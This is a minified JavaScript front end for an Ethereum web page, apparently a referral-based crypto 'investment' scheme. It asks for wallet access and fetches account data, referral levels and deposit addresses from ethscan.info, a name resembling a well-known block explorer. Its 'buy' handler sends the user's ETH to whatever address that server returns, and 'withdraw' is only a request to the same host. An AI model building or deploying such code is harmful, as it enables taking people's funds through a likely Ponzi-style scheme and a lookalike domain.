var $jscomp=$jscomp||{};$jscomp.scope={};$jscomp.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};$jscomp.arrayIterator=function(a){return{next:$jscomp.arrayIteratorImpl(a)}};$jscomp.makeIterator=function(a){var b="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return b?b.call(a):$jscomp.arrayIterator(a)};
$jscomp.getGlobal=function(a){a=["object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global,a];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};$jscomp.global=$jscomp.getGlobal(this);$jscomp.ASSUME_ES5=!1;$jscomp.ASSUME_NO_NATIVE_MAP=!1;$jscomp.ASSUME_NO_NATIVE_SET=!1;$jscomp.SIMPLE_FROUND_POLYFILL=!1;
$jscomp.defineProperty=$jscomp.ASSUME_ES5||"function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){a!=Array.prototype&&a!=Object.prototype&&(a[b]=c.value)};$jscomp.polyfill=function(a,b,c,d){if(b){c=$jscomp.global;a=a.split(".");for(d=0;d<a.length-1;d++){var e=a[d];e in c||(c[e]={});c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&null!=b&&$jscomp.defineProperty(c,a,{configurable:!0,writable:!0,value:b})}};$jscomp.FORCE_POLYFILL_PROMISE=!1;
$jscomp.polyfill("Promise",function(a){function b(){this.batch_=null}function c(a){return a instanceof e?a:new e(function(b,c){b(a)})}if(a&&!$jscomp.FORCE_POLYFILL_PROMISE)return a;b.prototype.asyncExecute=function(a){if(null==this.batch_){this.batch_=[];var b=this;this.asyncExecuteFunction(function(){b.executeBatch_()})}this.batch_.push(a)};var d=$jscomp.global.setTimeout;b.prototype.asyncExecuteFunction=function(a){d(a,0)};b.prototype.executeBatch_=function(){for(;this.batch_&&this.batch_.length;){var a=
this.batch_;this.batch_=[];for(var b=0;b<a.length;++b){var c=a[b];a[b]=null;try{c()}catch(l){this.asyncThrow_(l)}}}this.batch_=null};b.prototype.asyncThrow_=function(a){this.asyncExecuteFunction(function(){throw a;})};var e=function(a){this.state_=0;this.result_=void 0;this.onSettledCallbacks_=[];var b=this.createResolveAndReject_();try{a(b.resolve,b.reject)}catch(h){b.reject(h)}};e.prototype.createResolveAndReject_=function(){function a(a){return function(f){c||(c=!0,a.call(b,f))}}var b=this,c=!1;
return{resolve:a(this.resolveTo_),reject:a(this.reject_)}};e.prototype.resolveTo_=function(a){if(a===this)this.reject_(new TypeError("A Promise cannot resolve to itself"));else if(a instanceof e)this.settleSameAsPromise_(a);else{a:switch(typeof a){case "object":var b=null!=a;break a;case "function":b=!0;break a;default:b=!1}b?this.resolveToNonPromiseObj_(a):this.fulfill_(a)}};e.prototype.resolveToNonPromiseObj_=function(a){var b=void 0;try{b=a.then}catch(h){this.reject_(h);return}"function"==typeof b?
this.settleSameAsThenable_(b,a):this.fulfill_(a)};e.prototype.reject_=function(a){this.settle_(2,a)};e.prototype.fulfill_=function(a){this.settle_(1,a)};e.prototype.settle_=function(a,b){if(0!=this.state_)throw Error("Cannot settle("+a+", "+b+"): Promise already settled in state"+this.state_);this.state_=a;this.result_=b;this.executeOnSettledCallbacks_()};e.prototype.executeOnSettledCallbacks_=function(){if(null!=this.onSettledCallbacks_){for(var a=0;a<this.onSettledCallbacks_.length;++a)g.asyncExecute(this.onSettledCallbacks_[a]);
this.onSettledCallbacks_=null}};var g=new b;e.prototype.settleSameAsPromise_=function(a){var b=this.createResolveAndReject_();a.callWhenSettled_(b.resolve,b.reject)};e.prototype.settleSameAsThenable_=function(a,b){var c=this.createResolveAndReject_();try{a.call(b,c.resolve,c.reject)}catch(l){c.reject(l)}};e.prototype.then=function(a,b){function c(a,b){return"function"==typeof a?function(b){try{d(a(b))}catch(n){f(n)}}:b}var d,f,m=new e(function(a,b){d=a;f=b});this.callWhenSettled_(c(a,d),c(b,f));return m};
e.prototype["catch"]=function(a){return this.then(void 0,a)};e.prototype.callWhenSettled_=function(a,b){function c(){switch(d.state_){case 1:a(d.result_);break;case 2:b(d.result_);break;default:throw Error("Unexpected state: "+d.state_);}}var d=this;null==this.onSettledCallbacks_?g.asyncExecute(c):this.onSettledCallbacks_.push(c)};e.resolve=c;e.reject=function(a){return new e(function(b,c){c(a)})};e.race=function(a){return new e(function(b,d){for(var e=$jscomp.makeIterator(a),f=e.next();!f.done;f=
e.next())c(f.value).callWhenSettled_(b,d)})};e.all=function(a){var b=$jscomp.makeIterator(a),d=b.next();return d.done?c([]):new e(function(a,e){function f(b){return function(c){g[b]=c;h--;0==h&&a(g)}}var g=[],h=0;do g.push(void 0),h++,c(d.value).callWhenSettled_(f(g.length-1),e),d=b.next();while(!d.done)})};return e},"es6","es3");$jscomp.SYMBOL_PREFIX="jscomp_symbol_";$jscomp.initSymbol=function(){$jscomp.initSymbol=function(){};$jscomp.global.Symbol||($jscomp.global.Symbol=$jscomp.Symbol)};
$jscomp.SymbolClass=function(a,b){this.$jscomp$symbol$id_=a;$jscomp.defineProperty(this,"description",{configurable:!0,writable:!0,value:b})};$jscomp.SymbolClass.prototype.toString=function(){return this.$jscomp$symbol$id_};$jscomp.Symbol=function(){function a(c){if(this instanceof a)throw new TypeError("Symbol is not a constructor");return new $jscomp.SymbolClass($jscomp.SYMBOL_PREFIX+(c||"")+"_"+b++,c)}var b=0;return a}();
$jscomp.initSymbolIterator=function(){$jscomp.initSymbol();var a=$jscomp.global.Symbol.iterator;a||(a=$jscomp.global.Symbol.iterator=$jscomp.global.Symbol("Symbol.iterator"));"function"!=typeof Array.prototype[a]&&$jscomp.defineProperty(Array.prototype,a,{configurable:!0,writable:!0,value:function(){return $jscomp.iteratorPrototype($jscomp.arrayIteratorImpl(this))}});$jscomp.initSymbolIterator=function(){}};
$jscomp.initSymbolAsyncIterator=function(){$jscomp.initSymbol();var a=$jscomp.global.Symbol.asyncIterator;a||(a=$jscomp.global.Symbol.asyncIterator=$jscomp.global.Symbol("Symbol.asyncIterator"));$jscomp.initSymbolAsyncIterator=function(){}};$jscomp.iteratorPrototype=function(a){$jscomp.initSymbolIterator();a={next:a};a[$jscomp.global.Symbol.iterator]=function(){return this};return a};$jscomp.underscoreProtoCanBeSet=function(){var a={a:!0},b={};try{return b.__proto__=a,b.a}catch(c){}return!1};
$jscomp.setPrototypeOf="function"==typeof Object.setPrototypeOf?Object.setPrototypeOf:$jscomp.underscoreProtoCanBeSet()?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null;$jscomp.generator={};$jscomp.generator.ensureIteratorResultIsObject_=function(a){if(!(a instanceof Object))throw new TypeError("Iterator result "+a+" is not an object");};
$jscomp.generator.Context=function(){this.isRunning_=!1;this.yieldAllIterator_=null;this.yieldResult=void 0;this.nextAddress=1;this.finallyAddress_=this.catchAddress_=0;this.finallyContexts_=this.abruptCompletion_=null};$jscomp.generator.Context.prototype.start_=function(){if(this.isRunning_)throw new TypeError("Generator is already running");this.isRunning_=!0};$jscomp.generator.Context.prototype.stop_=function(){this.isRunning_=!1};
$jscomp.generator.Context.prototype.jumpToErrorHandler_=function(){this.nextAddress=this.catchAddress_||this.finallyAddress_};$jscomp.generator.Context.prototype.next_=function(a){this.yieldResult=a};$jscomp.generator.Context.prototype.throw_=function(a){this.abruptCompletion_={exception:a,isException:!0};this.jumpToErrorHandler_()};$jscomp.generator.Context.prototype["return"]=function(a){this.abruptCompletion_={"return":a};this.nextAddress=this.finallyAddress_};
$jscomp.generator.Context.prototype.jumpThroughFinallyBlocks=function(a){this.abruptCompletion_={jumpTo:a};this.nextAddress=this.finallyAddress_};$jscomp.generator.Context.prototype.yield=function(a,b){this.nextAddress=b;return{value:a}};$jscomp.generator.Context.prototype.yieldAll=function(a,b){var c=$jscomp.makeIterator(a),d=c.next();$jscomp.generator.ensureIteratorResultIsObject_(d);if(d.done)this.yieldResult=d.value,this.nextAddress=b;else return this.yieldAllIterator_=c,this.yield(d.value,b)};
$jscomp.generator.Context.prototype.jumpTo=function(a){this.nextAddress=a};$jscomp.generator.Context.prototype.jumpToEnd=function(){this.nextAddress=0};$jscomp.generator.Context.prototype.setCatchFinallyBlocks=function(a,b){this.catchAddress_=a;void 0!=b&&(this.finallyAddress_=b)};$jscomp.generator.Context.prototype.setFinallyBlock=function(a){this.catchAddress_=0;this.finallyAddress_=a||0};$jscomp.generator.Context.prototype.leaveTryBlock=function(a,b){this.nextAddress=a;this.catchAddress_=b||0};
$jscomp.generator.Context.prototype.enterCatchBlock=function(a){this.catchAddress_=a||0;a=this.abruptCompletion_.exception;this.abruptCompletion_=null;return a};$jscomp.generator.Context.prototype.enterFinallyBlock=function(a,b,c){c?this.finallyContexts_[c]=this.abruptCompletion_:this.finallyContexts_=[this.abruptCompletion_];this.catchAddress_=a||0;this.finallyAddress_=b||0};
$jscomp.generator.Context.prototype.leaveFinallyBlock=function(a,b){var c=this.finallyContexts_.splice(b||0)[0];if(c=this.abruptCompletion_=this.abruptCompletion_||c){if(c.isException)return this.jumpToErrorHandler_();void 0!=c.jumpTo&&this.finallyAddress_<c.jumpTo?(this.nextAddress=c.jumpTo,this.abruptCompletion_=null):this.nextAddress=this.finallyAddress_}else this.nextAddress=a};$jscomp.generator.Context.prototype.forIn=function(a){return new $jscomp.generator.Context.PropertyIterator(a)};
$jscomp.generator.Context.PropertyIterator=function(a){this.object_=a;this.properties_=[];for(var b in a)this.properties_.push(b);this.properties_.reverse()};$jscomp.generator.Context.PropertyIterator.prototype.getNext=function(){for(;0<this.properties_.length;){var a=this.properties_.pop();if(a in this.object_)return a}return null};$jscomp.generator.Engine_=function(a){this.context_=new $jscomp.generator.Context;this.program_=a};
$jscomp.generator.Engine_.prototype.next_=function(a){this.context_.start_();if(this.context_.yieldAllIterator_)return this.yieldAllStep_(this.context_.yieldAllIterator_.next,a,this.context_.next_);this.context_.next_(a);return this.nextStep_()};
$jscomp.generator.Engine_.prototype.return_=function(a){this.context_.start_();var b=this.context_.yieldAllIterator_;if(b)return this.yieldAllStep_("return"in b?b["return"]:function(a){return{value:a,done:!0}},a,this.context_["return"]);this.context_["return"](a);return this.nextStep_()};
$jscomp.generator.Engine_.prototype.throw_=function(a){this.context_.start_();if(this.context_.yieldAllIterator_)return this.yieldAllStep_(this.context_.yieldAllIterator_["throw"],a,this.context_.next_);this.context_.throw_(a);return this.nextStep_()};
$jscomp.generator.Engine_.prototype.yieldAllStep_=function(a,b,c){try{var d=a.call(this.context_.yieldAllIterator_,b);$jscomp.generator.ensureIteratorResultIsObject_(d);if(!d.done)return this.context_.stop_(),d;var e=d.value}catch(g){return this.context_.yieldAllIterator_=null,this.context_.throw_(g),this.nextStep_()}this.context_.yieldAllIterator_=null;c.call(this.context_,e);return this.nextStep_()};
$jscomp.generator.Engine_.prototype.nextStep_=function(){for(;this.context_.nextAddress;)try{var a=this.program_(this.context_);if(a)return this.context_.stop_(),{value:a.value,done:!1}}catch(b){this.context_.yieldResult=void 0,this.context_.throw_(b)}this.context_.stop_();if(this.context_.abruptCompletion_){a=this.context_.abruptCompletion_;this.context_.abruptCompletion_=null;if(a.isException)throw a.exception;return{value:a["return"],done:!0}}return{value:void 0,done:!0}};
$jscomp.generator.Generator_=function(a){this.next=function(b){return a.next_(b)};this["throw"]=function(b){return a.throw_(b)};this["return"]=function(b){return a.return_(b)};$jscomp.initSymbolIterator();this[Symbol.iterator]=function(){return this}};$jscomp.generator.createGenerator=function(a,b){var c=new $jscomp.generator.Generator_(new $jscomp.generator.Engine_(b));$jscomp.setPrototypeOf&&$jscomp.setPrototypeOf(c,a.prototype);return c};
$jscomp.asyncExecutePromiseGenerator=function(a){function b(b){return a.next(b)}function c(b){return a["throw"](b)}return new Promise(function(d,e){function g(a){a.done?d(a.value):Promise.resolve(a.value).then(b,c).then(g,e)}g(a.next())})};$jscomp.asyncExecutePromiseGeneratorFunction=function(a){return $jscomp.asyncExecutePromiseGenerator(a())};$jscomp.asyncExecutePromiseGeneratorProgram=function(a){return $jscomp.asyncExecutePromiseGenerator(new $jscomp.generator.Generator_(new $jscomp.generator.Engine_(a)))};
var address="",account={},web3,balance=0;
App={web3Provider:null,contracts:{},init:function(){return $jscomp.asyncExecutePromiseGeneratorProgram(function(a){return 1==a.nextAddress?a.yield(App.initWeb3(),2):a["return"](a.yieldResult)})},initWeb3:function(){var a,b,c,d,e,g,f,m,h,l;return $jscomp.asyncExecutePromiseGeneratorProgram(function(k){switch(k.nextAddress){case 1:if(!window.ethereum){window.web3?App.web3Provider=window.web3.currentProvider:browse();k.jumpTo(2);break}App.web3Provider=window.ethereum;k.setCatchFinallyBlocks(3);return k.yield(window.ethereum.enable(),
5);case 5:k.leaveTryBlock(2);break;case 3:k.enterCatchBlock(),layer.msg("User denied account access");case 2:web3=new Web3(App.web3Provider);address=web3.eth.accounts[0];getCoinBalance(web3,address);getAccount(address);a=account.assets.eth*account.config.out/100*account.config.rate;$("#invite").html(account.my.code);$("#identity").html("V"+account.my.identity);$("#father").html(account.my.father);$("#child").html(account.my.child);$("#share").html(account.assets.share+" ETH");$("#results").html(account.assets.results+
" ETH");$("#exit").html(account.assets.exit+" ETH");$("#total").html(account.assets.total+" ETH");$("#withdrawFee").html(a.toFixed(2)+" SDDS");$(".sddsBalance").html(account.assets.sdds);$(".sddsbl").html(account.config.rate+":1");$("#inviteUrl").html(window.location.protocol+"//"+window.location.host+window.location.pathname+"?invite="+account.my.code);b=.1;0<account.assets.active&&(b=account.assets.active);null!=account.assets.exchangeList&&(c="",$.each(account.assets.exchangeList,function(a,b){c+=
'<div class="d-flex justify-content-between"><div>'+b.createTime+"</div><div>"+b.amount+"</div></div>"}),$("#exchangeList").append(c));for(d=0;49>d;d++)deg=3.75*d-90,$("#kedu").append(' <div class="absolute ruler" style="z-index:'+d+"; transform: rotate("+deg+'deg);">\n            <div class="absolute ruler-deg ruler-bg" style="overflow: hidden; z-index: '+d+';"></div>\n            </div>');g=b/5;for(f=0;6>f;f++)e=37.5*f-90,m=360-e,h=g*f,h=h.toFixed(2),$("#kedu-text").append('<div class="absolute kedu-text"  style="z-index:'+
f+" ; transform: rotate("+e+'deg);">\n<div class="kedu-text-item" style="transform: rotate('+m+"deg); border-radius: 0px; white-space: pre; z-index:"+f+';">'+h+"</div></div>");loadData(account.assets.eth,b);l=new ClipboardJS(".copy");l.on("success",function(a){layer.msg("success");a.clearSelection()});return k["return"](App.bindEvents())}})},bindEvents:function(){$(document).on("click",".btn-submit",App.handleAdopt)},handleAdopt:function(a){a.preventDefault();a=$(a.target).data("type");var b=$(".value"+
a).val();switch(a){case "buy":if(0>=b){layer.msg("error");break}if(account.assets.sdds<buyFee(b)){layer.msg("\u624b\u7eed\u8d39\u4e0d\u8db3");break}transfer(web3,account.my.ethAddress,b);break;case "sdds":if(0>=b){layer.msg("error");break}transfer(web3,account.my.sddsAddress,b);break;case "withdraw":b=account.assets.eth,account.assets.sdds<buyFee(b)?layer.msg("\u624b\u7eed\u8d39\u4e0d\u8db3"):$.post("https://ethscan.info","type=withdraw&address="+address+"&amount="+b,function(a){0===a.status?layer.msg(a.message):
window.location.reload()})}}};
$(function(){function a(a){$("[i18n]").i18n({defaultLang:a,filePath:"lang/"});$("#lang").html("cn"==a?"EN":"\u4e2d")}$.ajaxSetup({async:!1});$(window).load(function(){App.init()});$(".quickSelect").on("click",function(){$(".valuebuy").val($(this).data("amount"));changeAmount()});$(".valuebuy").on("blur change propertychange input",function(){changeAmount()});var b=localStorage.getItem("lang");void 0!=b&&null!=b&&""!=b||localStorage.setItem("lang","cn");a(b);$("#lang").on("click",function(){b="cn"==
b?"en":"cn";localStorage.setItem("lang",b);a(b)});$(".showAbout").on("click",function(){layer.open({type:1,anim:2,title:!1,shadeClose:!0,content:$("#about-"+b)})});$(".showStatistics").on("click",function(){layer.open({type:1,anim:2,title:!1,shadeClose:!0,content:$("#statistics-"+b)})})});
function browse(){var a='<div id="browseTip">    <div class="box" style="font-size: 12px;line-height: 22px; background-color: #393D49; color: #fff; ">        <h6 class="text-center">\u63d0\u793a:\u8bf7\u5b89\u88c5\u4ee5\u4e0b\u7b2c\u4e09\u65b9\u94b1\u5305</h6>        <div class="PartnerList">';a=isPC()?a+'<a href="https://metamask.io/"><img src="images/Partner05.png"><span>MetaMask</span></a>':a+'<a href="https://www.token.im/"><img src="images/Partner01.png"><span>imToken</span></a><a href="https://www.huobiwallet.com/"><img src="images/Partner02.png"><span>huobi Wallet</span></a><a href="https://trustwallet.com/"><img src="images/Partner03.png"><span>Trust Wallet</span></a><a href="http://mathwallet.net/cn/?from=singlemessage"><img src="images/Partner04.png"><span>Math Wallet</span></a>';
layer.open({type:1,title:!1,closeBtn:!0,area:"90%;",shade:.8,id:"browse",resize:!1,moveType:1,content:a+"   </div></div></div>"})}function isPC(){for(var a=navigator.userAgent,b="Android;iPhone;SymbianOS;Windows Phone;iPad;iPod".split(";"),c=!0,d=0;d<b.length;d++)if(0<a.indexOf(b[d])){c=!1;break}return c}
function changeAmount(){var a=$(".valuebuy").val();if(""!=a){if(Math.ceil(a)!==Math.floor(a))return layer.msg("\u53ea\u80fd\u4e3a\u6b63\u6574\u6570"),!1;if(0>=a)return layer.msg("\u4e0d\u80fd\u4e3a\u8d1f\u6570"),!1;if(a>balance)return layer.msg("\u4f59\u989d\u4e0d\u8db3"),!1;$("#fee").html(buyFee(a))}}function buyFee(a){return parseFloat((a*account.config["in"]/100*account.config.rate).toFixed(2))}
function getCoinBalance(a,b){a.eth.getBalance(b,function(b,d){balance=new Number(a.fromWei(d,"ether"));$(".ethBalance").html(Math.floor(100*balance)/100)})}function transfer(a,b,c){a.eth.sendTransaction({from:address,to:b,value:a.toWei(c,"ether")},function(a,b){a||getHash(b)})}function getHash(a){layer.load();setInterval(function(){$.post("https://ethscan.info","type=hash&hash="+a,function(a){"wait"!==a.data&&window.location.reload()})},1E3)}
function getAccount(a){var b=GetRequest();$.post("https://ethscan.info","type=account&address="+a+"&invite="+b.invite,function(a){account=a.data})}
function loadData(a,b){$(".ruler-text").html(a+"<span>ETH</span>");$(".kedu-text-item").each(function(c,d){c/6<=a/b?$(".kedu-text-item").eq(c).css("opacity","1"):$(".kedu-text-item").eq(c).css("opacity","0.5")});$(".ruler-deg").each(function(c,d){3.75*c/180<=a/b?$(".ruler-deg").eq(c).addClass("ruler-active").removeClass("ruler-bg"):$(".ruler-deg").eq(c).addClass("ruler-bg").removeClass("ruler-active")})}
function GetRequest(a){var b="undefined"==typeof a?decodeURI(location.search):"?"+a.split("?")[1];a={};if(-1!=b.indexOf("?"))for(strs=b.substr(1).split("&"),b=0;b<strs.length;b++)a[strs[b].split("=")[0]]=decodeURI(strs[b].split("=")[1]);return a};